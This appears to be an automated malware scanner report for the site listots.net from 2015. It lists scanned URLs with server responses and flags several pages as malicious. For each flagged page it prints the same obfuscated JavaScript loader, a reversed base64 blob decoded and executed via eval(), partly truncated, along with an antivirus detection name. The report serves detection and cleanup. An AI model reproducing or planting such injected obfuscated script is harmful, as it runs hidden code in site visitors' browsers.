Malware Scanner report for listots.net

Malicious/Suspicious/Total urls checked: 10/0/42

10 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://listots.net/	200 OK Content-Length: 20429 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js	200 OK Content-Length: 77746 Content-Type: text/javascript	clean
http://listots.net/css/js.js	200 OK Content-Length: 1660 Content-Type: application/x-javascript	clean
http://listots.net/?lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:10 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=8dddp87dqn4pued4uvujst17i3; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/test404page.js	200 OK Content-Length: 383 Content-Type: text/html	clean
http://jwpsrv.com/library/V3zuDmQ2EeOxhCIACmOLpg.js	200 OK Content-Length: 75568 Content-Type: text/javascript	clean
http://listots.net/?lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:11 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=c3qr621c07087c84nh5nktcvg4; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/?lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:11 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=3ugt6kuafdvb2u6ruu3mlks112; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php	200 OK Content-Length: 20456 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=r3ok4ab6ifsnb4j92k0u4bcdr1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=rb2231vk47irk678ko10jj1es4; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=qtd1e3knrgm8u7cf1s8sh0k2g6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=support	200 OK Content-Length: 8197 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?action=support&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=t1unlg2v51531fmi98loppk1d7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=support&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=7evihliq0pr0e46qme5cr362s0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=support&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ijeks580ce1u0ops7dj4rq7tr6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=register	200 OK Content-Length: 8403 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?action=register&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=dch520oh425rekdp26mjvuh2a0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=register&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=q85pffgkv4d65ti4sh4tqdoda2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=register&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=81j08bsl5bgjqnb4ubjv98bga1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=download	200 OK Content-Length: 9503 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?action=download&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=p0c2s93mm69rrf83irimie4hv2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=download&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=409ef7kh02n0e4srdp6ls1pm16; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?action=download&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=sb1tf77emvgouh9e3mi9penko0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/download/ipchanger.zip	200 OK Content-Length: 301144 Content-Type: application/zip	clean
http://listots.net/index.php?byco=&oocoo=&page=0	200 OK Content-Length: 20516 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?byco=&oocoo=&page=0&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=thd4oj4iapdudm0bra9g8mhfa7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=0&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=gsa032m5ut09g95hmmn9nju5d2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=0&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9lemcb0m0bfmnn31kd36r6qu37; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=1	200 OK Content-Length: 20516 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?byco=&oocoo=&page=1&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=sspmo36e5up17b7a3dju3nrup6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=1&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bjdi6k9iorj5ckhi017bgaa420; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=1&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=95k9m2r8k79lpalucpqoji4377; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=2	200 OK Content-Length: 9667 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?byco=&oocoo=&page=2&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=4iikodlrt1oigjfdqvb7eh0rv2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=2&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fjotgl2nv6t88erg2vocu0hph6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=2&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bj8496igdkoa14ha3ndu7hkem7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=3	200 OK Content-Length: 9667 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G
http://listots.net/index.php?byco=&oocoo=&page=3&lang=en	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d0sul2kmtqgtpfr90nuufam506; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=3&lang=pl	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ri19d03rb5lqqrlpblukmcki02; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
